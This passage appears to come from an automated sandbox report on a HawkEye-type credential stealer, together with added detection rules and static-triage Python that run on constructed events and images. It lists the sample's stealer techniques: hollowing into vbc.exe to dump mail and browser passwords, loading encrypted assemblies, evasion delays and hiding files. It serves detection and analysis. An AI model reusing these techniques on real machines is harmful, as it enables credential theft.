sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 13_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs Base64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', '+NuhvnHL/23apr//8A7D9HKLlcgATfODiXKjHLGsasbFDJBFHqbDrty+sGNtrFgc0eVe1DxY3U1N9v9ixGVjuQ==', 'oS55EiDwvndYEtZ5+lXTfbIb8G1taLPDlWmbhqlMK5CSJNdt9Qbgk/vwkhCaHpDIwtEy26QBS+jq3mOtR2AT75ZDkMahwZY7KngJ5TRfdok=', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs Cryptographic APIs: 'CreateDecryptor'
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                Source: Binary string: C:\gfzfo\jdgvpo\ilxz\eb80024cfd9a4588b9c5c2bbb297cb83\uledka\mpuuwnfg\Release\mpuuwnfg.pdb source: TGQfHfehsY.exe, 00000001.00000002.265684302.000000000040B000.00000004.00000001.01000000.00000003.sdmp, pjavpo.exe, 00000003.00000000.229757777.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe, 00000003.00000002.245881929.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe, 00000005.00000000.232538937.0000000000418000.00000002.00000001.01000000.00000004.sdmp, pjavpo.exe.1.dr
                Source: Binary string: wntdll.pdbUGP source: pjavpo.exe, 00000003.00000003.242842960.000000001A030000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000003.00000003.236238654.000000001A1C0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.500841796.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: pjavpo.exe, 00000003.00000003.242842960.000000001A030000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000003.00000003.236238654.000000001A1C0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.310652543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000C.00000000.305733767.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pjavpo.exe, pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmp
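The process tree above is the part of this report that converts most directly into detection logic: a dropper in %TEMP% relaunches itself, then starts the legitimate vbc.exe (the VB.NET compiler) with the NirSoft export switch /stext so that the mailpv and WebBrowserPassView code hollowed into it writes holdermail.txt and holderwb.txt, while the dropper itself writes pid.txt and flips Explorer's Hidden setting. The rules below are an added example, not Joe Sandbox code and not a rule set shipped with any product. The events are constructed Sysmon-style records assembled from the command lines, paths and registry key shown in this report (field names Image, ParentImage, CommandLine, TargetFilename, TargetObject are an assumption about the log source), the devenv.exe compile is a constructed benign control, and the NirSoft switch list is taken from the tools' own documented export options.

```python
"""Detection rules for the HawkEye process tree in this report, run over
constructed Sysmon-style events (added example, not sandbox telemetry)."""
import re
from collections import Counter
from typing import Any, Callable, Dict, List, Tuple

Event = Dict[str, Any]

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# NirSoft export switches; the real vbc.exe accepts none of them, so one of
# these on a vbc.exe command line means foreign code is running in that image.
NIRSOFT_EXPORT_RE = re.compile(r"(?:^|\s)/s(?:text|html|xml|comma|tab)\b", re.IGNORECASE)
# Output files this sample writes (brittle, sample-specific indicators).
DUMP_FILES = {"holdermail.txt", "holderwb.txt", "pid.txt"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def vbc_with_export_switch(ev: Event) -> bool:
    return (ev["EventID"] == 1 and basename(ev["Image"]) == "vbc.exe"
            and NIRSOFT_EXPORT_RE.search(ev["CommandLine"]) is not None)


def temp_binary_relaunches_itself(ev: Event) -> bool:
    # pjavpo.exe spawning pjavpo.exe: the child is the hollowing target.
    return (ev["EventID"] == 1 and TEMP_DIR_RE.search(ev["Image"]) is not None
            and ev["Image"].lower() == ev["ParentImage"].lower())


def windows_binary_with_temp_parent(ev: Event) -> bool:
    return (ev["EventID"] == 1 and ev["Image"].lower().startswith("c:\\windows\\")
            and TEMP_DIR_RE.search(ev["ParentImage"]) is not None)


def credential_dump_file(ev: Event) -> bool:
    return ev["EventID"] == 11 and basename(ev["TargetFilename"]) in DUMP_FILES


def explorer_hidden_files_toggled(ev: Event) -> bool:
    return (ev["EventID"] == 13
            and ev["TargetObject"].lower().endswith("\\explorer\\advanced\\hidden"))


RULES: Dict[str, Callable[[Event], bool]] = {
    "vbc_with_export_switch": vbc_with_export_switch,
    "temp_binary_relaunches_itself": temp_binary_relaunches_itself,
    "windows_binary_with_temp_parent": windows_binary_with_temp_parent,
    "credential_dump_file": credential_dump_file,
    "explorer_hidden_files_toggled": explorer_hidden_files_toggled,
}


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, image) for every event a rule matches."""
    return [(name, ev["Image"]) for ev in events
            for name, rule in RULES.items() if rule(ev)]


def summarize(events: List[Event]) -> Dict[str, int]:
    return dict(Counter(name for name, _ in detect(events)))


# Constructed events mirroring the report's process tree and artifacts.
TEMP = r"C:\Users\user\AppData\Local\Temp"
DROPPER = TEMP + r"\pjavpo.exe"
VBC = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": DROPPER, "ParentImage": r"C:\Users\user\Desktop\TGQfHfehsY.exe",
     "CommandLine": DROPPER + " " + TEMP + r"\brtwja"},
    {"EventID": 1, "Image": DROPPER, "ParentImage": DROPPER,
     "CommandLine": DROPPER + " " + TEMP + r"\brtwja"},
    {"EventID": 1, "Image": VBC, "ParentImage": DROPPER,
     "CommandLine": VBC + ' /stext "' + TEMP + r'\holdermail.txt"'},
    {"EventID": 1, "Image": VBC, "ParentImage": DROPPER,
     "CommandLine": VBC + ' /stext "' + TEMP + r'\holderwb.txt"'},
    # Benign control (constructed): a real compile started by Visual Studio.
    {"EventID": 1, "Image": VBC,
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio 10.0\Common7\IDE\devenv.exe",
     "CommandLine": VBC + " /target:exe /out:build.exe Module1.vb"},
    {"EventID": 11, "Image": DROPPER, "TargetFilename": r"C:\Users\user\AppData\Roaming\pid.txt"},
    {"EventID": 13, "Image": DROPPER, "Details": "DWORD (0x00000002)",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
]

if __name__ == "__main__":
    for name, image in detect(SAMPLE_EVENTS):
        print(f"{name:34} {image}")
```

The first event (the dropper started from the desktop) deliberately produces no hit: an executable written to %TEMP% is what most installers do, so that alone is not worth alerting on. The self-relaunch, the export switch on vbc.exe, and a Windows binary whose parent lives in %TEMP% are the signals that survive in a real environment; the file-name rule is only useful for this family's build and will not generalize.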

                Data Obfuscation

                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: 5.2.pjavpo.exe.4a20000.16.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Code function: 3_2_0040F655 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Code function: 5_2_00401F16 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Code function: 5_2_00B27F02 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 12_2_00411879 push ecx; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 12_2_004118A0 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 12_2_004118A0 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 13_2_00442871 push ecx; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 13_2_00442A90 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 13_2_00442A90 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 13_2_00446E54 push eax; ret
                Source: C:\Users\user\Desktop\TGQfHfehsY.exe Code function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                Source: TGQfHfehsY.exe Static PE information: real checksum: 0x0 should be: 0xab3f3
                Source: pjavpo.exe.1.dr Static PE information: real checksum: 0x2c4c6 should be: 0x22f88
                Source: C:\Users\user\Desktop\TGQfHfehsY.exe File created: C:\Users\user\AppData\Local\Temp\pjavpo.exe
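Two of the static findings in this section are worth reproducing by hand. The checksum lines distinguish two different situations: TGQfHfehsY.exe carries a checksum of 0x0, which only means the linker never filled the field (it is optional for user-mode executables and the loader enforces it only for drivers and a few system images), whereas pjavpo.exe stores 0x2c4c6 against a computed 0x22f88, which means the file's bytes differ from what a linker once checksummed (patched, appended to, or the field was forged). The Base64 strings in Form1.cs sit next to CreateDecryptor/TransformFinalBlock and the Assembly.Load(System.Byte[]) calls in stealMail and stealWebroswers, and the mailpv.pdb and WebBrowserPassView.pdb strings later turn up inside vbc.exe, so the expected pipeline is decode, decrypt, load. Without the key the ciphertext cannot be recovered, but its size can be checked against that expectation. The code below is an added example, not Joe Sandbox or sample code: the PE images are constructed in-line (DOS header plus PE32 headers, no sections) and the four strings are copied from this report.

```python
"""Static triage for the Data Obfuscation findings: PE checksum verification on
constructed images and a size/entropy check of the Form1.cs Base64 strings.
Added example, not Joe Sandbox or sample code."""
import base64
import math
import struct
from collections import Counter
from typing import Dict, Tuple


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """IMAGE_OPTIONAL_HEADER.CheckSum: 32-bit end-around-carry sum of the file
    with the checksum field skipped, folded to 16 bits, plus the file length
    (the algorithm imagehlp's CheckSumMappedFile uses; pefile does the same)."""
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def checksum_field_offset(image: bytes) -> int:
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image")
    # Signature (4) + IMAGE_FILE_HEADER (20) + CheckSum at optional-header offset 64
    return e_lfanew + 4 + 20 + 64


def checksum_verdict(image: bytes) -> Tuple[str, int, int]:
    """'unset' (field is 0, linker never filled it), 'ok', or 'mismatch'."""
    off = checksum_field_offset(image)
    stored = struct.unpack_from("<I", image, off)[0]
    computed = pe_checksum(image, off)
    if stored == 0:
        return "unset", stored, computed
    return ("ok" if stored == computed else "mismatch"), stored, computed


def build_minimal_pe(stored_checksum: int, overlay: bytes = b"") -> bytes:
    """Constructed header-only PE32 image, enough for the checksum logic."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 64, stored_checksum)
    return bytes(dos) + b"PE\x00\x00" + file_hdr + bytes(opt) + overlay


def stamp_checksum(image: bytes) -> bytes:
    """Write the correct checksum into the field, as a linker with /RELEASE does."""
    buf = bytearray(image)
    off = checksum_field_offset(image)
    struct.pack_into("<I", buf, off, pe_checksum(image, off))
    return bytes(buf)


# The four strings the report lists for Form1.cs (copied from the report).
FORM1_B64 = [
    "kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+",
    "+NuhvnHL/23apr//8A7D9HKLlcgATfODiXKjHLGsasbFDJBFHqbDrty+sGNtrFgc0eVe1DxY3U1N9v9ixGVjuQ==",
    "oS55EiDwvndYEtZ5+lXTfbIb8G1taLPDlWmbhqlMK5CSJNdt9Qbgk/vwkhCaHpDIwtEy26QBS+jq3mOtR2AT75ZDkMahwZY7KngJ5TRfdok=",
    "PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w==",
]


def shannon_entropy(buf: bytes) -> float:
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def triage_b64(s: str) -> Dict[str, object]:
    raw = base64.b64decode(s)
    return {
        "length": len(raw),
        "block_aligned": len(raw) % 16 == 0,     # AES/Rijndael block with PKCS7 padding
        "entropy": round(shannon_entropy(raw), 2),
        "printable": all(0x20 <= b < 0x7F for b in raw),
    }


if __name__ == "__main__":
    unset = build_minimal_pe(0, b"payload")
    good = stamp_checksum(unset)
    for img in (unset, good, good + b"\x00" * 16):   # last one: overlay appended after linking
        print(checksum_verdict(img))
    for s in FORM1_B64:
        print(triage_b64(s))
```

All four strings decode to 48, 64, 80 and 64 bytes, every one a multiple of the 16-byte block size, which is what padded block-cipher output looks like and what plain Base64-wrapped text or a raw PE would almost never give four times in a row. Treat the mismatch verdict, not the unset one, as the signal: a zero field is the default for most unsigned builds.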

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 3_2_0040E101 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe TID: 6820Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe TID: 2380Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe TID: 2560Thread sleep time: -140000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exe TID: 6312Thread sleep time: -180000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 13_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 180000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeWindow / User API: threadDelayed 509
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeAPI coverage: 6.1 %
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: GetAdaptersInfo,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 120000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 140000
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeThread delayed: delay time: 180000
                Source: C:\Users\user\Desktop\TGQfHfehsY.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeAPI call chain: ExitProcess graph end node
                Source: bhv8D09.tmp.13.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&ctry=US&time=20220311T105602Z&lc=en-US&pl=en-US&idtp=mid&uid=a9223225-82ba-4622-a95e-dcecd6738abd&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9ebbac39d9a3402085c24368353fb3cf&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1417890&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1417890&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
